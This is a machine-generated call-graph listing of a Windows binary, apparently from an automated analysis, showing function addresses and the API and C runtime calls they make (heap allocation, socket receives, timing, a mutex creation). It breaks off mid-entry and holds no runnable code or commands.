10057->10088 10060 f9a903 10058->10060 10061 f99b7c 10139 f98b30 10061->10139 10063 f99b8d 10176 fa8220 10063->10176 10065 f99b9c 10066 fa7a00 RtlAllocateHeap 10065->10066 10067 f99ca9 10066->10067 10068 f95c10 4 API calls 10067->10068 10069 f99cb1 10068->10069 10070 f98b30 4 API calls 10069->10070 10071 f99cc2 10070->10071 10072 fa8220 RtlAllocateHeap 10071->10072 10073 f99cd1 10072->10073 10075 fa7a26 10074->10075 10076 fa7a2d 10075->10076 10077 fa7a62 10075->10077 10078 fa7a81 10075->10078 10076->10057 10079 fa7ab9 10077->10079 10080 fa7a69 10077->10080 10083 fad3e2 RtlAllocateHeap 10078->10083 10085 fa7a76 __cftof 10078->10085 10081 f92480 RtlAllocateHeap 10079->10081 10082 fad3e2 RtlAllocateHeap 10080->10082 10084 fa7a6f 10081->10084 10082->10084 10083->10085 10084->10085 10086 fc6c6a RtlAllocateHeap 10084->10086 10085->10057 10087 fa7ac3 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ __Cnd_unregister_at_thread_exit 10086->10087 10087->10057 10184 f95940 10088->10184 10090 f95c54 10187 f94b30 10090->10187 10092 f95d17 shared_ptr std::future_error::future_error 10092->10061 10093 f95c7b shared_ptr 10093->10092 10094 fc6c6a RtlAllocateHeap 10093->10094 10095 f95d47 __cftof 10094->10095 10095->10095 10096 fa80c0 RtlAllocateHeap 10095->10096 10098 f95e3e 10096->10098 10097 f95ea6 shared_ptr std::future_error::future_error 10097->10061 10098->10097 10099 fc6c6a RtlAllocateHeap 10098->10099 10100 f95ed2 10099->10100 10101 f95ffe shared_ptr std::future_error::future_error 10100->10101 10102 fc6c6a RtlAllocateHeap 10100->10102 10101->10061 10103 f9601b 10102->10103 10104 fa80c0 RtlAllocateHeap 10103->10104 10105 f96089 10104->10105 10106 fa80c0 RtlAllocateHeap 10105->10106 10107 f960bd 10106->10107 10108 fa80c0 RtlAllocateHeap 10107->10108 10109 f960ee 10108->10109 10110 fa80c0 RtlAllocateHeap 10109->10110 10111 f9611f 10110->10111 10112 fa80c0 RtlAllocateHeap 10111->10112 10114 f96150 10112->10114 10113 f965b1 shared_ptr std::future_error::future_error 10113->10061 10114->10113 10115 fc6c6a RtlAllocateHeap 10114->10115 10116 f965dc 10115->10116 10117 fa7a00 RtlAllocateHeap 10116->10117 10118 f966a6 10117->10118 10119 f95c10 4 API calls 10118->10119 10120 f966ac 10119->10120 10121 f95c10 4 API calls 10120->10121 10122 f966b1 10121->10122 10194 f922c0 10122->10194 10124 f966c9 shared_ptr 10125 fa7a00 RtlAllocateHeap 10124->10125 10126 f96732 10125->10126 10127 f95c10 4 API calls 10126->10127 10128 f9673d 10127->10128 10129 f922c0 4 API calls 10128->10129 10138 f96757 shared_ptr 10129->10138 10130 f96852 10131 fa80c0 RtlAllocateHeap 10130->10131 10133 f9689c 10131->10133 10132 fa7a00 RtlAllocateHeap 10132->10138 10134 fa80c0 RtlAllocateHeap 10133->10134 10137 f968e3 shared_ptr std::future_error::future_error 10134->10137 10135 f95c10 4 API calls 10135->10138 10136 f922c0 4 API calls 10136->10138 10137->10061 10138->10130 10138->10132 10138->10135 10138->10136 10140 f98b7c 10139->10140 10141 fa7a00 RtlAllocateHeap 10140->10141 10142 f98b8c 10141->10142 10143 f95c10 4 API calls 10142->10143 10144 f98b97 10143->10144 10145 fa80c0 RtlAllocateHeap 10144->10145 10146 f98be3 10145->10146 10147 fa80c0 RtlAllocateHeap 10146->10147 10148 f98c35 10147->10148 10149 fa8220 RtlAllocateHeap 10148->10149 10150 f98c47 shared_ptr 10149->10150 10151 f98d01 shared_ptr std::future_error::future_error 10150->10151 10152 fc6c6a RtlAllocateHeap 10150->10152 10151->10063 10153 f98d2d 10152->10153 10154 fa7a00 RtlAllocateHeap 10153->10154 10155 f98d8f 10154->10155 10156 f95c10 4 API calls 10155->10156 10157 f98d9a 10156->10157 10158 fa80c0 RtlAllocateHeap 10157->10158 10159 f98dec 10158->10159 10160 fa8220 RtlAllocateHeap 10159->10160 10162 f98dfe shared_ptr 10160->10162 10161 f98e7e shared_ptr std::future_error::future_error 10161->10063 10162->10161 10163 fc6c6a RtlAllocateHeap 10162->10163 10164 f98eaa 10163->10164 10165 fa7a00 RtlAllocateHeap 10164->10165 10166 f98f0f 10165->10166 10167 f95c10 4 API calls 10166->10167 10168 f98f1a 10167->10168 10169 fa80c0 RtlAllocateHeap 10168->10169 10170 f98f6c 10169->10170 10171 fa8220 RtlAllocateHeap 10170->10171 10173 f98f7e shared_ptr 10171->10173 10172 f98ffe shared_ptr std::future_error::future_error 10172->10063 10173->10172 10174 fc6c6a RtlAllocateHeap 10173->10174 10175 f9902a 10174->10175 10177 fa8248 10176->10177 10179 fa8292 10176->10179 10178 fa8251 10177->10178 10177->10179 10180 fa9280 RtlAllocateHeap 10178->10180 10181 fa82a1 10179->10181 10687 fa8f40 10179->10687 10182 fa825a 10180->10182 10181->10065 10182->10065 10197 fa7f80 10184->10197 10186 f9596b 10186->10090 10188 f94dc2 10187->10188 10189 f94b92 10187->10189 10188->10093 10191 f94ce5 10189->10191 10212 fc6da6 10189->10212 10217 fa8ca0 10189->10217 10191->10188 10192 fa8ca0 RtlAllocateHeap 10191->10192 10192->10191 10401 f92280 10194->10401 10200 fa7fc7 10197->10200 10202 fa7f9e __cftof 10197->10202 10198 fa80b3 10199 fa9270 RtlAllocateHeap 10198->10199 10201 fa80b8 10199->10201 10200->10198 10205 fa801b 10200->10205 10206 fa803e 10200->10206 10203 f92480 RtlAllocateHeap 10201->10203 10202->10186 10204 fa80bd 10203->10204 10205->10201 10207 fad3e2 RtlAllocateHeap 10205->10207 10208 fad3e2 RtlAllocateHeap 10206->10208 10209 fa802c __cftof 10206->10209 10207->10209 10208->10209 10210 fa8095 shared_ptr 10209->10210 10211 fc6c6a RtlAllocateHeap 10209->10211 10210->10186 10211->10198 10213 fc6db4 10212->10213 10214 fc6dc2 10212->10214 10232 fc6d19 10213->10232 10214->10189 10218 fa8dc9 10217->10218 10219 fa8cc3 10217->10219 10220 fa9270 RtlAllocateHeap 10218->10220 10223 fa8d2f 10219->10223 10224 fa8d05 10219->10224 10221 fa8dce 10220->10221 10222 f92480 RtlAllocateHeap 10221->10222 10230 fa8d16 __cftof 10222->10230 10226 fad3e2 RtlAllocateHeap 10223->10226 10223->10230 10224->10221 10225 fa8d10 10224->10225 10228 fad3e2 RtlAllocateHeap 10225->10228 10226->10230 10227 fc6c6a RtlAllocateHeap 10229 fa8dd8 10227->10229 10228->10230 10230->10227 10231 fa8d8b shared_ptr __cftof 10230->10231 10231->10189 10237 fc690a 10232->10237 10236 fc6d3d 10236->10189 10238 fc692a 10237->10238 10244 fc6921 10237->10244 10238->10244 10251 fca671 10238->10251 10245 fc6d52 10244->10245 10246 fc6d8f 10245->10246 10247 fc6d5f 10245->10247 10385 fcb67d 10246->10385 10248 fc6d6e 10247->10248 10380 fcb6a1 10247->10380 10248->10236 10252 fca67b __dosmaperr 10251->10252 10253 fcd82f __dosmaperr RtlAllocateHeap 10252->10253 10254 fca694 10252->10254 10256 fca6bc __dosmaperr 10253->10256 10255 fc694a 10254->10255 10273 fc8bec 10254->10273 10265 fcb5fb 10255->10265 10258 fca6fc 10256->10258 10259 fca6c4 __dosmaperr 10256->10259 10262 fca49f __dosmaperr RtlAllocateHeap 10258->10262 10260 fcadf5 __freea RtlAllocateHeap 10259->10260 10260->10254 10263 fca707 10262->10263 10264 fcadf5 __freea RtlAllocateHeap 10263->10264 10264->10254 10266 fcb60e 10265->10266 10268 fc6960 10265->10268 10266->10268 10306 fcf5ab 10266->10306 10269 fcb628 10268->10269 10270 fcb63b 10269->10270 10271 fcb650 10269->10271 10270->10271 10319 fce6b1 10270->10319 10271->10244 10274 fc8bf1 __cftof 10273->10274 10278 fc8bfc ___std_exception_copy 10274->10278 10279 fcd634 10274->10279 10300 fc65ed 10278->10300 10280 fcd640 __dosmaperr 10279->10280 10281 fca7c8 __dosmaperr RtlAllocateHeap 10280->10281 10286 fcd667 __cftof 10280->10286 10288 fcd66d __cftof __dosmaperr 10280->10288 10281->10286 10282 fcd6b2 10284 fc75f6 __dosmaperr RtlAllocateHeap 10282->10284 10283 fcd69c 10283->10278 10285 fcd6b7 10284->10285 10287 fc6c5a ___std_exception_copy RtlAllocateHeap 10285->10287 10286->10282 10286->10283 10286->10288 10287->10283 10289 fcd81b __cftof 10288->10289 10290 fcd726 10288->10290 10293 fcd751 __cftof 10288->10293 10291 fc65ed __cftof 3 API calls 10289->10291 10290->10293 10303 fcd62b 10290->10303 10292 fcd82e 10291->10292 10293->10283 10296 fca671 __cftof 4 API calls 10293->10296 10298 fcd7a5 10293->10298 10296->10298 10297 fcd62b __cftof 4 API calls 10297->10293 10298->10283 10299 fca671 __cftof 4 API calls 10298->10299 10299->10283 10301 fc64c7 __cftof 3 API calls 10300->10301 10302 fc65fe 10301->10302 10304 fca671 __cftof 4 API calls 10303->10304 10305 fcd630 10304->10305 10305->10297 10307 fcf5b7 __dosmaperr 10306->10307 10308 fca671 __cftof 4 API calls 10307->10308 10310 fcf5c0 __dosmaperr 10308->10310 10309 fcf606 10309->10268 10310->10309 10315 fcf62c 10310->10315 10312 fcf5ef __cftof 10312->10309 10313 fc8bec __cftof 4 API calls 10312->10313 10314 fcf62b 10313->10314 10316 fcf647 10315->10316 10317 fcf63a __cftof 10315->10317 10316->10312 10317->10316 10318 fcf35f __cftof RtlAllocateHeap 10317->10318 10318->10316 10320 fca671 __cftof 4 API calls 10319->10320 10321 fce6bb 10320->10321 10324 fce5c9 10321->10324 10323 fce6c1 10323->10271 10327 fce5d5 __dosmaperr 10324->10327 10325 fce5f6 10325->10323 10326 fc8bec __cftof 4 API calls 10329 fce668 10326->10329 10328 fce5ef __cftof 10327->10328 10332 fcadf5 __freea RtlAllocateHeap 10327->10332 10328->10325 10328->10326 10330 fce6a4 10329->10330 10335 fca72e 10329->10335 10330->10323 10332->10328 10336 fca739 __dosmaperr 10335->10336 10337 fcd82f __dosmaperr RtlAllocateHeap 10336->10337 10348 fca745 10336->10348 10341 fca769 __dosmaperr 10337->10341 10338 fc8bec __cftof 4 API calls 10339 fca7c7 10338->10339 10340 fca7be 10349 fce4b0 10340->10349 10342 fca771 __dosmaperr 10341->10342 10343 fca7a5 10341->10343 10345 fcadf5 __freea RtlAllocateHeap 10342->10345 10344 fca49f __dosmaperr RtlAllocateHeap 10343->10344 10346 fca7b0 10344->10346 10345->10348 10347 fcadf5 __freea RtlAllocateHeap 10346->10347 10347->10348 10348->10338 10348->10340 10350 fce5c9 __cftof 4 API calls 10349->10350 10351 fce4c3 10350->10351 10368 fce259 10351->10368 10354 fce4dc 10354->10330 10355 fcb04b __cftof RtlAllocateHeap 10356 fce4ed 10355->10356 10364 fce51f 10356->10364 10371 fce6c4 10356->10371 10358 fce512 10361 fce51a 10358->10361 10365 fce535 __cftof 10358->10365 10359 fcadf5 __freea RtlAllocateHeap 10360 fce52d 10359->10360 10360->10330 10362 fc75f6 __dosmaperr RtlAllocateHeap 10361->10362 10362->10364 10363 fce561 10363->10364 10376 fce14b 10363->10376 10364->10359 10365->10363 10366 fcadf5 __freea RtlAllocateHeap 10365->10366 10366->10363 10369 fc690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10368->10369 10370 fce26b 10369->10370 10370->10354 10370->10355 10372 fce259 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10371->10372 10375 fce6e4 __cftof 10372->10375 10373 fce75a __cftof std::future_error::future_error 10373->10358 10374 fce32f __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10374->10373 10375->10373 10375->10374 10377 fce157 __dosmaperr 10376->10377 10378 fce198 __cftof RtlAllocateHeap 10377->10378 10379 fce16e __cftof 10378->10379 10379->10364 10381 fc690a __cftof 4 API calls 10380->10381 10382 fcb6be 10381->10382 10384 fcb6ce std::future_error::future_error 10382->10384 10390 fcf1bf 10382->10390 10384->10248 10386 fca671 __cftof 4 API calls 10385->10386 10387 fcb688 10386->10387 10388 fcb5fb __cftof 4 API calls 10387->10388 10389 fcb698 10388->10389 10389->10248 10391 fc690a __cftof 4 API calls 10390->10391 10392 fcf1df __cftof 10391->10392 10393 fcb04b __cftof RtlAllocateHeap 10392->10393 10394 fcf29d std::future_error::future_error 10392->10394 10396 fcf232 __cftof 10392->10396 10393->10396 10394->10384 10397 fcf2c2 10396->10397 10398 fcf2ce 10397->10398 10399 fcf2df 10397->10399 10398->10399 10400 fcadf5 __freea RtlAllocateHeap 10398->10400 10399->10394 10400->10399 10402 f92296 10401->10402 10405 fc87f8 10402->10405 10408 fc7609 10405->10408 10407 f922a4 10407->10124 10409 fc7649 10408->10409 10410 fc7631 10408->10410 10409->10410 10412 fc7651 10409->10412 10411 fc75f6 __dosmaperr RtlAllocateHeap 10410->10411 10413 fc7636 10411->10413 10414 fc690a __cftof 4 API calls 10412->10414 10415 fc6c5a ___std_exception_copy RtlAllocateHeap 10413->10415 10416 fc7661 10414->10416 10417 fc7641 std::future_error::future_error 10415->10417 10421 fc7bc4 10416->10421 10417->10407 10437 fc868d 10421->10437 10423 fc76e8 10434 fc7a19 10423->10434 10424 fc7be4 10425 fc75f6 __dosmaperr RtlAllocateHeap 10424->10425 10426 fc7be9 10425->10426 10427 fc6c5a ___std_exception_copy RtlAllocateHeap 10426->10427 10427->10423 10428 fc7bd5 10428->10423 10428->10424 10444 fc7d15 10428->10444 10452 fc8168 10428->10452 10457 fc7dc2 10428->10457 10462 fc7de8 10428->10462 10491 fc7f36 10428->10491 10435 fcadf5 __freea RtlAllocateHeap 10434->10435 10436 fc7a29 10435->10436 10436->10417 10438 fc86a5 10437->10438 10439 fc8692 10437->10439 10438->10428 10440 fc75f6 __dosmaperr RtlAllocateHeap 10439->10440 10441 fc8697 10440->10441 10442 fc6c5a ___std_exception_copy RtlAllocateHeap 10441->10442 10443 fc86a2 10442->10443 10443->10428 10513 fc7d34 10444->10513 10446 fc7d1a 10447 fc7d31 10446->10447 10448 fc75f6 __dosmaperr RtlAllocateHeap 10446->10448 10447->10428 10449 fc7d23 10448->10449 10450 fc6c5a ___std_exception_copy RtlAllocateHeap 10449->10450 10451 fc7d2e 10450->10451 10451->10428 10453 fc8178 10452->10453 10454 fc8171 10452->10454 10453->10428 10522 fc7b50 10454->10522 10458 fc7dcb 10457->10458 10459 fc7dd2 10457->10459 10460 fc7b50 4 API calls 10458->10460 10459->10428 10461 fc7dd1 10460->10461 10461->10428 10463 fc7def 10462->10463 10464 fc7e09 10462->10464 10465 fc7f4f 10463->10465 10466 fc7fbb 10463->10466 10468 fc7e39 10463->10468 10467 fc75f6 __dosmaperr RtlAllocateHeap 10464->10467 10464->10468 10478 fc7f5b 10465->10478 10483 fc7f92 10465->10483 10471 fc8001 10466->10471 10472 fc7fc2 10466->10472 10466->10483 10469 fc7e25 10467->10469 10468->10428 10470 fc6c5a ___std_exception_copy RtlAllocateHeap 10469->10470 10473 fc7e30 10470->10473 10581 fc8604 10471->10581 10475 fc7f69 10472->10475 10476 fc7fc7 10472->10476 10473->10428 10482 fc7f8b 10475->10482 10489 fc7f77 10475->10489 10575 fc8241 10475->10575 10477 fc7fcc 10476->10477 10476->10483 10484 fc7fdf 10477->10484 10485 fc7fd1 10477->10485 10478->10475 10481 fc7fa2 10478->10481 10478->10489 10481->10482 10552 fc8390 10481->10552 10482->10428 10483->10482 10483->10489 10566 fc8420 10483->10566 10560 fc8571 10484->10560 10485->10482 10556 fc85e5 10485->10556 10489->10482 10584 fc86ea 10489->10584 10492 fc7f4f 10491->10492 10493 fc7fbb 10491->10493 10502 fc7f92 10492->10502 10503 fc7f5b 10492->10503 10494 fc8001 10493->10494 10495 fc7fc2 10493->10495 10493->10502 10496 fc8604 RtlAllocateHeap 10494->10496 10497 fc7f69 10495->10497 10498 fc7fc7 10495->10498 10511 fc7f77 10496->10511 10501 fc7f8b 10497->10501 10505 fc8241 4 API calls 10497->10505 10497->10511 10499 fc7fcc 10498->10499 10498->10502 10506 fc7fdf 10499->10506 10507 fc7fd1 10499->10507 10500 fc7fa2 10500->10501 10509 fc8390 4 API calls 10500->10509 10501->10428 10502->10501 10504 fc8420 RtlAllocateHeap 10502->10504 10502->10511 10503->10497 10503->10500 10503->10511 10504->10511 10505->10511 10508 fc8571 RtlAllocateHeap 10506->10508 10507->10501 10510 fc85e5 RtlAllocateHeap 10507->10510 10508->10511 10509->10511 10510->10511 10511->10501 10512 fc86ea 4 API calls 10511->10512 10512->10501 10516 fc7d5e 10513->10516 10515 fc7d40 10515->10446 10517 fc7d80 10516->10517 10518 fc75f6 __dosmaperr RtlAllocateHeap 10517->10518 10521 fc7db7 10517->10521 10519 fc7dac 10518->10519 10520 fc6c5a ___std_exception_copy RtlAllocateHeap 10519->10520 10520->10521 10521->10515 10523 fc7b67 10522->10523 10524 fc7b62 10522->10524 10530 fc8ab6 10523->10530 10526 fc75f6 __dosmaperr RtlAllocateHeap 10524->10526 10526->10523 10528 fc75f6 __dosmaperr RtlAllocateHeap 10529 fc7b99 10528->10529 10529->10428 10531 fc8ad1 10530->10531 10534 fc8868 10531->10534 10535 fc868d RtlAllocateHeap 10534->10535 10539 fc887a 10535->10539 10536 fc7b85 10536->10528 10536->10529 10537 fc88b3 10540 fc690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10537->10540 10538 fc888f 10541 fc75f6 __dosmaperr RtlAllocateHeap 10538->10541 10539->10536 10539->10537 10539->10538 10545 fc88bf 10540->10545 10542 fc8894 10541->10542 10544 fc6c5a ___std_exception_copy RtlAllocateHeap 10542->10544 10543 fc6d52 GetPEB ExitProcess GetPEB RtlAllocateHeap 10543->10545 10544->10536 10545->10543 10546 fc88ee 10545->10546 10548 fc8a8d RtlAllocateHeap 10546->10548 10549 fc8958 10546->10549 10547 fc8a8d RtlAllocateHeap 10550 fc8a20 10547->10550 10548->10549 10549->10547 10550->10536 10551 fc75f6 __dosmaperr RtlAllocateHeap 10550->10551 10551->10536 10554 fc83ab 10552->10554 10553 fc83dd 10553->10489 10554->10553 10588 fcc88e 10554->10588 10557 fc85f1 10556->10557 10558 fc8420 RtlAllocateHeap 10557->10558 10559 fc8603 10558->10559 10559->10489 10564 fc8586 10560->10564 10561 fc75f6 __dosmaperr RtlAllocateHeap 10562 fc858f 10561->10562 10563 fc6c5a ___std_exception_copy RtlAllocateHeap 10562->10563 10565 fc859a 10563->10565 10564->10561 10564->10565 10565->10489 10567 fc8433 10566->10567 10568 fc844e 10567->10568 10570 fc8465 10567->10570 10569 fc75f6 __dosmaperr RtlAllocateHeap 10568->10569 10571 fc8453 10569->10571 10574 fc845e 10570->10574 10612 fc779f 10570->10612 10572 fc6c5a ___std_exception_copy RtlAllocateHeap 10571->10572 10572->10574 10574->10489 10576 fc825a 10575->10576 10577 fc779f RtlAllocateHeap 10576->10577 10578 fc8297 10577->10578 10625 fcd3c8 10578->10625 10580 fc830d 10580->10489 10580->10580 10582 fc8420 RtlAllocateHeap 10581->10582 10583 fc861b 10582->10583 10583->10489 10585 fc875d std::future_error::future_error 10584->10585 10586 fc8707 10584->10586 10585->10482 10586->10585 10587 fcc88e __cftof 4 API calls 10586->10587 10587->10586 10591 fcc733 10588->10591 10592 fcc743 10591->10592 10593 fcc76d 10592->10593 10594 fcc781 10592->10594 10604 fcc748 10592->10604 10595 fc75f6 __dosmaperr RtlAllocateHeap 10593->10595 10596 fc690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10594->10596 10597 fcc772 10595->10597 10598 fcc78c 10596->10598 10599 fc6c5a ___std_exception_copy RtlAllocateHeap 10597->10599 10600 fcc79c 10598->10600 10603 fcc7c8 __cftof 10598->10603 10599->10604 10601 fd2b7d __cftof RtlAllocateHeap 10600->10601 10602 fcc7b1 10601->10602 10602->10604 10608 fc75f6 __dosmaperr RtlAllocateHeap 10602->10608 10607 fcc7de __cftof 10603->10607 10611 fcc815 __cftof 10603->10611 10604->10553 10605 fc75f6 __dosmaperr RtlAllocateHeap 10605->10604 10606 fc75f6 __dosmaperr RtlAllocateHeap 10609 fcc87f 10606->10609 10607->10604 10607->10605 10608->10604 10610 fc6c5a ___std_exception_copy RtlAllocateHeap 10609->10610 10610->10604 10611->10604 10611->10606 10613 fc77b4 10612->10613 10615 fc77c3 10612->10615 10614 fc75f6 __dosmaperr RtlAllocateHeap 10613->10614 10616 fc77b9 10614->10616 10615->10616 10617 fcb04b __cftof RtlAllocateHeap 10615->10617 10616->10574 10618 fc77ea 10617->10618 10619 fc7801 10618->10619 10622 fc7a33 10618->10622 10621 fcadf5 __freea RtlAllocateHeap 10619->10621 10621->10616 10623 fcadf5 __freea RtlAllocateHeap 10622->10623 10624 fc7a42 10623->10624 10624->10619 10626 fcd3ee 10625->10626 10627 fcd3d8 10625->10627 10626->10627 10632 fcd400 10626->10632 10628 fc75f6 __dosmaperr RtlAllocateHeap 10627->10628 10629 fcd3dd 10628->10629 10630 fc6c5a ___std_exception_copy RtlAllocateHeap 10629->10630 10631 fcd3e7 10630->10631 10631->10580 10633 fcd467 10632->10633 10634 fcd439 10632->10634 10635 fcd485 10633->10635 10636 fcd48a 10633->10636 10646 fcd2ff 10634->10646 10637 fcd4ae 10635->10637 10638 fcd4e4 10635->10638 10651 fccbdf 10636->10651 10640 fcd4cc 10637->10640 10641 fcd4b3 10637->10641 10679 fccef8 10638->10679 10672 fcd0e2 10640->10672 10662 fcd23e 10641->10662 10647 fcd315 10646->10647 10648 fcd320 10646->10648 10647->10631 10649 fca1f1 ___std_exception_copy RtlAllocateHeap 10648->10649 10650 fcd37b ___std_exception_copy 10649->10650 10650->10631 10652 fccbf1 10651->10652 10653 fc690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10652->10653 10654 fccc05 10653->10654 10655 fccc0d 10654->10655 10656 fccc21 10654->10656 10657 fc75f6 __dosmaperr RtlAllocateHeap 10655->10657 10659 fccef8 GetPEB ExitProcess GetPEB RtlAllocateHeap 10656->10659 10661 fccc1c __alldvrm __cftof _strrchr 10656->10661 10658 fccc12 10657->10658 10660 fc6c5a ___std_exception_copy RtlAllocateHeap 10658->10660 10659->10661 10660->10661 10661->10631 10663 fd31a8 RtlAllocateHeap 10662->10663 10664 fcd26c 10663->10664 10665 fd2c47 RtlAllocateHeap 10664->10665 10666 fcd29e 10665->10666 10667 fcd2de 10666->10667 10669 fcd2a5 10666->10669 10670 fcd2b7 10666->10670 10668 fccf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 10667->10668 10668->10669 10669->10631 10671 fcd16d GetPEB ExitProcess GetPEB RtlAllocateHeap 10670->10671 10671->10669 10673 fd31a8 RtlAllocateHeap 10672->10673 10674 fcd10f 10673->10674 10675 fd2c47 RtlAllocateHeap 10674->10675 10676 fcd147 10675->10676 10677 fcd14e 10676->10677 10678 fcd16d GetPEB ExitProcess GetPEB RtlAllocateHeap 10676->10678 10677->10631 10678->10677 10680 fccf10 10679->10680 10681 fd31a8 RtlAllocateHeap 10680->10681 10682 fccf29 10681->10682 10683 fd2c47 RtlAllocateHeap 10682->10683 10684 fccf6e 10683->10684 10685 fccf75 10684->10685 10686 fccf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 10684->10686 10685->10631 10686->10685 10688 fa8f6b 10687->10688 10689 fa908e 10687->10689 10693 fa8fdc 10688->10693 10694 fa8fb2 10688->10694 10690 fa9270 RtlAllocateHeap 10689->10690 10691 fa9093 10690->10691 10692 f92480 RtlAllocateHeap 10691->10692 10704 fa8fc3 __cftof 10692->10704 10696 fad3e2 RtlAllocateHeap 10693->10696 10693->10704 10694->10691 10695 fa8fbd 10694->10695 10698 fad3e2 RtlAllocateHeap 10695->10698 10696->10704 10697 fc6c6a RtlAllocateHeap 10699 fa909d 10697->10699 10698->10704 10700 fa90b8 10699->10700 10702 fa90be 10699->10702 10705 f92480 std::_Throw_future_error 10699->10705 10701 fad3e2 RtlAllocateHeap 10700->10701 10701->10702 10702->10181 10703 fa904c shared_ptr __cftof 10703->10181 10704->10697 10704->10703 10706 fc38af ___std_exception_copy RtlAllocateHeap 10705->10706 10707 f924c3 10706->10707 10707->10181 10819 f92ec0 10820 f92f7e GetCurrentThreadId 10819->10820 10821 f92f06 10819->10821 10823 f92f94 10820->10823 10824 f92fef 10820->10824 10822 fac6ac GetSystemTimePreciseAsFileTime 10821->10822 10825 f92f12 10822->10825 10823->10824 10830 fac6ac GetSystemTimePreciseAsFileTime 10823->10830 10826 f92f1d 10825->10826 10827 f9301e 10825->10827 10831 fad3e2 RtlAllocateHeap 10826->10831 10834 f92f30 __Mtx_unlock 10826->10834 10828 fac26a 5 API calls 10827->10828 10829 f93024 10828->10829 10832 fac26a 5 API calls 10829->10832 10833 f92fb9 10830->10833 10831->10834 10832->10833 10836 fac26a 5 API calls 10833->10836 10837 f92fc0 __Mtx_unlock 10833->10837 10834->10829 10835 f92f6f 10834->10835 10835->10820 10835->10824 10836->10837 10838 fac26a 5 API calls 10837->10838 10839 f92fd8 __Cnd_broadcast 10837->10839 10838->10839 10839->10824 10840 fac26a 5 API calls 10839->10840 10841 f9303c 10840->10841 10842 fac6ac GetSystemTimePreciseAsFileTime 10841->10842 10846 f93080 shared_ptr __Mtx_unlock 10842->10846 10843 f931c5 10844 fac26a 5 API calls 10843->10844 10845 f931cb 10844->10845 10847 fac26a 5 API calls 10845->10847 10846->10843 10846->10845 10850 f931a7 std::future_error::future_error 10846->10850 10852 f93132 GetCurrentThreadId 10846->10852 10848 f931d1 10847->10848 10849 fac26a 5 API calls 10848->10849 10856 f93193 __Mtx_unlock 10849->10856 10851 fac26a 5 API calls 10853 f931dd 10851->10853 10852->10850 10854 f9313b 10852->10854 10854->10850 10855 fac6ac GetSystemTimePreciseAsFileTime 10854->10855 10857 f9315f 10855->10857 10856->10850 10856->10851 10857->10843 10857->10848 10857->10856 10859 fabd4c 10857->10859 10862 fabb72 10859->10862 10861 fabd5c 10861->10857 10863 fabb9c 10862->10863 10864 facf6b _xtime_get GetSystemTimePreciseAsFileTime 10863->10864 10867 fabba4 __Xtime_diff_to_millis2 std::future_error::future_error 10863->10867 10865 fabbcf __Xtime_diff_to_millis2 10864->10865 10866 facf6b _xtime_get GetSystemTimePreciseAsFileTime 10865->10866 10865->10867 10866->10867 10867->10861 10733 f9e0c0 recv 10734 f9e122 recv 10733->10734 10735 f9e157 recv 10734->10735 10737 f9e191 10735->10737 10736 f9e2b3 std::future_error::future_error 10737->10736 10742 fac6ac 10737->10742 10749 fac452 10742->10749 10744 f9e2ee 10745 fac26a 10744->10745 10746 fac292 10745->10746 10747 fac274 10745->10747 10746->10746 10747->10746 10766 fac297 10747->10766 10750 fac4a8 10749->10750 10752 fac47a std::future_error::future_error 10749->10752 10750->10752 10755 facf6b 10750->10755 10752->10744 10753 fac4fd __Xtime_diff_to_millis2 10753->10752 10754 facf6b _xtime_get GetSystemTimePreciseAsFileTime 10753->10754 10754->10753 10756 facf7a 10755->10756 10758 facf87 __aulldvrm 10755->10758 10756->10758 10759 facf44 10756->10759 10758->10753 10762 facbea 10759->10762 10763 facbfb GetSystemTimePreciseAsFileTime 10762->10763 10764 facc07 10762->10764 10763->10764 10764->10758 10771 f92ae0 10766->10771 10768 fac2ae 10778 fac1ff 10768->10778 10770 fac2bf std::_Throw_future_error 10786 fabedf 10771->10786 10773 f92af4 __dosmaperr 10773->10768 10774 fca671 __cftof 4 API calls 10773->10774 10775 fc6ccc 10774->10775 10776 fc8bec __cftof 4 API calls 10775->10776 10777 fc6cf6 10776->10777 10779 fac20b __EH_prolog3_GS 10778->10779 10780 fa80c0 RtlAllocateHeap 10779->10780 10781 fac23d 10780->10781 10793 f926b0 10781->10793 10783 fac252 10810 fa7970 10783->10810 10785 fac25a 10785->10770 10789 facc31 10786->10789 10790 facc3f InitOnceExecuteOnce 10789->10790 10792 fabef2 10789->10792 10790->10792 10792->10773 10794 fa7a00 RtlAllocateHeap 10793->10794 10795 f92702 10794->10795 10796 f92725 10795->10796 10797 fa8f40 RtlAllocateHeap 10795->10797 10798 fa8f40 RtlAllocateHeap 10796->10798 10799 f9278e 10796->10799 10797->10796 10798->10799 10800 f927ed shared_ptr 10799->10800 10802 f928b8 10799->10802 10801 fc38af ___std_exception_copy RtlAllocateHeap 10800->10801 10805 f9284b 10801->10805 10804 fc6c6a RtlAllocateHeap 10802->10804 10803 f9287a shared_ptr std::future_error::future_error 10803->10783 10804->10805 10805->10803 10806 fc6c6a RtlAllocateHeap 10805->10806 10807 f928c2 10806->10807 10815 fc3912 10807->10815 10809 f928e5 shared_ptr 10809->10783 10811 fa797b 10810->10811 10812 fa7996 shared_ptr 10810->10812 10811->10812 10813 fc6c6a RtlAllocateHeap 10811->10813 10812->10785 10814 fa79ba 10813->10814 10816 fc391f 10815->10816 10817 fc3926 10815->10817 10818 fc8ba3 ___std_exception_destroy RtlAllocateHeap 10816->10818 10817->10809 10818->10817 10888 fad0c7 10889 fad0d7 10888->10889 10890 fad17f 10889->10890 10891 fad17b RtlWakeAllConditionVariable 10889->10891 10892 f99ab8 10894 f99acc 10892->10894 10895 f99b08 10894->10895 10896 f99b4b shared_ptr 10895->10896 10899 f9a917 10895->10899 10897 f99b59 10896->10897 10898 f99b65 10896->10898 10904 fa80c0 RtlAllocateHeap 10897->10904 10900 fa7a00 RtlAllocateHeap 10898->10900 10902 f9a953 Sleep CreateMutexA 10899->10902 10903 fc6c6a RtlAllocateHeap 10899->10903 10901 f99b74 10900->10901 10905 f95c10 4 API calls 10901->10905 10909 f9a98e 10902->10909 10903->10902 10906 f9a903 10904->10906 10907 f99b7c 10905->10907 10908 f98b30 4 API 